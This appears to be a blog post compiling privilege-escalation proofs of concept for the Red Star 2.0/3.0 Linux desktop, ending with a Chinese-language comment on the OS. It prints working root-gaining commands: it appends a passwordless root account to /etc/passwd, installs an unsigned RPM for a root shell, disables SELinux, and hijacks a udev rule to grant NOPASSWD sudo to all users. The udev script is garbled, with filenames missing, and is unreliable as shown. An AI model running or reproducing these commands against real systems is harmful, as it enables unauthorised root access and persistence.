RedStar 2.0/3.0 Desktop - Privilege Escalation

first,we talk about RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit) Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here PoC:
/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root
star2 Source: RedStar 3.0 Desktop - Privilege Escalation (Software Manager -
The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. 
UnFortunately, they left a big security hole: the Software Manager (, 
which runs as root through sudo and will install any RPM package, even if unsigned.
To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
double-click it to open it with the Software Manager, and click through the blue buttons until it’s done.
After that, run rootsh to get a root shell. 
Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, 
but disabling it is a matter of running setenforce 0 as root.
star3 Source: RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)
#!/bin/bash -e
## Alternative steps:
## Proof:
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/
chmod +x /tmp/
echo "sudo will be available after reboot"
sleep 2
star32 Source: & 吐槽: 关于Red Star这个系统我开始以为是red hat的什么软件啊啥的。后来在网上看了下,居然是朝鲜民族在xxx的带领下自主开发的linux操作系统。想知道详情的请移步北朝鲜:开发出自己的Linux系统Red Star。看了某俄罗斯的测评。感觉不错。值得注意的是,红星操作系统安装简易,只需15分钟即可安装完成,但也相当非国际化,只有一个语种:朝鲜语。看界面发现和Windows体验很贴近。唯一和其他版本的Linux相比,红星的一个显著特征是:sudo 变成了 kimjongildo。看着就醉了~